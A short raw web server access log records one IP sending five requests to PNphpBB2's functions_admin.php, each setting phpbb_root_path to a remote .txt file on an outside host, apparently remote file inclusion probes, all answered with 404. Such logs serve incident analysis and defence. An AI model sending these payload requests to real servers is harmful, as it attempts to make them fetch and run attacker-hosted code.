67.205.89.200 - - [28/Apr/2009:09:30:02 -0700] "GET /logs/access_080512.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:02 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:05 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:06 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:10 -0700] "GET /logs/access_090123.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
